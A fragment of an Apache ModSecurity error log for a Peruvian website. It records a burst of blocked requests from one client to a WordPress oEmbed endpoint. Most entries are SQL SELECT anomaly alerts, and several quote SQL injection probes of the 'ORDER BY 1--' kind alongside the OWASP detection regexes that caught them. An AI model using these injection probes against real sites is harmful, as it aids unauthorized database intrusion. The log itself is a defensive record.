139653923456768] [client 141.98.81.52:56698] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26n-wCyyCVFXh0DMS2cAAAAIk"] [Thu Aug 15 03:21:52.228939 2024] [:error] [pid 31519:tid 139653864707840] [client 141.98.81.52:56700] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26oHxeJlWfH1pdny5XGQAAANA"] [Thu Aug 15 03:21:52.845249 2024] [:error] [pid 31337:tid 139654032893696] [client 141.98.81.52:56702] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26oOwCyyCVFXh0DMS2cQAAAIQ"] [Thu Aug 15 03:21:53.194175 2024] [:error] [pid 31519:tid 139653898278656] [client 141.98.81.52:56704] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26oXxeJlWfH1pdny5XGgAAAMw"] [Thu Aug 15 03:21:53.646265 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:56706] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26oXxeJlWfH1pdny5XGwAAAMg"] [Thu Aug 15 03:21:54.115042 2024] [:error] [pid 31337:tid 139654041286400] [client 141.98.81.52:56710] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26ouwCyyCVFXh0DMS2cgAAAIM"] [Thu Aug 15 03:21:54.625942 2024] [:error] [pid 31335:tid 139653831137024] [client 141.98.81.52:56712] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26om0MD5oChETZltkVRAAAABQ"] [Thu Aug 15 03:21:55.277910 2024] [:error] [pid 31519:tid 139653797566208] [client 141.98.81.52:56714] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26o3xeJlWfH1pdny5XHQAAANg"] [Thu Aug 15 03:21:55.675074 2024] [:error] [pid 31335:tid 139653881493248] [client 141.98.81.52:56716] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/ ORDER BY 1-- rpkj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26o20MD5oChETZltkVRQAAAA4"] [Thu Aug 15 03:21:56.181110 2024] [:error] [pid 31519:tid 139653906671360] [client 141.98.81.52:56718] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26pHxeJlWfH1pdny5XHgAAAMs"] [Thu Aug 15 03:21:56.633482 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:56720] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26pHxeJlWfH1pdny5XHwAAAM0"] [Thu Aug 15 03:21:57.117070 2024] [:error] [pid 31337:tid 139653864707840] [client 141.98.81.52:56722] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26pewCyyCVFXh0DMS2cwAAAJA"] [Thu Aug 15 03:21:57.551560 2024] [:error] [pid 31337:tid 139653906671360] [client 141.98.81.52:56724] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26pewCyyCVFXh0DMS2dAAAAIs"] [Thu Aug 15 03:21:58.087909 2024] [:error] [pid 31337:tid 139653948634880] [client 141.98.81.52:56726] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26puwCyyCVFXh0DMS2dQAAAIY"] [Thu Aug 15 03:21:58.508193 2024] [:error] [pid 31337:tid 139653881493248] [client 141.98.81.52:56728] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26puwCyyCVFXh0DMS2dgAAAI4"] [Thu Aug 15 03:21:58.946276 2024] [:error] [pid 31337:tid 139653839529728] [client 141.98.81.52:56730] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26puwCyyCVFXh0DMS2dwAAAJM"] [Thu Aug 15 03:21:59.425587 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:56732] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26p3xeJlWfH1pdny5XIAAAAMI"] [Thu Aug 15 03:21:59.856938 2024] [:error] [pid 31519:tid 139653940242176] [client 141.98.81.52:56734] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26p3xeJlWfH1pdny5XIQAAAMc"] [Thu Aug 15 03:22:00.399217 2024] [:error] [pid 31336:tid 139653923456768] [client 141.98.81.52:56736] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26qEPAyXqJhbW53WyPQgAAAEk"] [Thu Aug 15 03:22:00.746680 2024] [:error] [pid 31336:tid 139653864707840] [client 141.98.81.52:56738] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/') ORDER BY 1-- WFfq"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26qEPAyXqJhbW53WyPQwAAAFA"] [Thu Aug 15 03:22:01.252162 2024] [:error] [pid 31335:tid 139653940242176] [client 141.98.81.52:56740] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26qW0MD5oChETZltkVRgAAAAc"] [Thu Aug 15 03:22:01.740183 2024] [:error] [pid 31337:tid 139654058071808] [client 141.98.81.52:56742] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26qewCyyCVFXh0DMS2eAAAAIE"] [Thu Aug 15 03:22:02.182796 2024] [:error] [pid 31336:tid 139654041286400] [client 141.98.81.52:56744] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26qkPAyXqJhbW53WyPRAAAAEM"] [Thu Aug 15 03:22:02.621556 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:56746] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26qnxeJlWfH1pdny5XIgAAAMM"] [Thu Aug 15 03:22:03.003269 2024] [:error] [pid 31337:tid 139654066464512] [client 141.98.81.52:56748] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26q-wCyyCVFXh0DMS2eQAAAIA"] [Thu Aug 15 03:22:03.412579 2024] [:error] [pid 31337:tid 139654049679104] [client 141.98.81.52:56750] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26q-wCyyCVFXh0DMS2egAAAII"] [Thu Aug 15 03:22:03.858095 2024] [:error] [pid 31335:tid 139653923456768] [client 141.98.81.52:56752] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26q20MD5oChETZltkVRwAAAAk"] [Thu Aug 15 03:22:04.320515 2024] [:error] [pid 31335:tid 139654024500992] [client 141.98.81.52:56754] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26rG0MD5oChETZltkVSAAAAAU"] [Thu Aug 15 03:22:04.794489 2024] [:error] [pid 31519:tid 139654032893696] [client 141.98.81.52:56756] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26rHxeJlWfH1pdny5XIwAAAMQ"] [Thu Aug 15 03:22:05.374876 2024] [:error] [pid 31519:tid 139653915064064] [client 141.98.81.52:56758] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26rXxeJlWfH1pdny5XJAAAAMo"] [Thu Aug 15 03:22:05.811698 2024] [:error] [pid 31519:tid 139653881493248] [client 141.98.81.52:56760] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/' ORDER BY 1-- wqoB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag 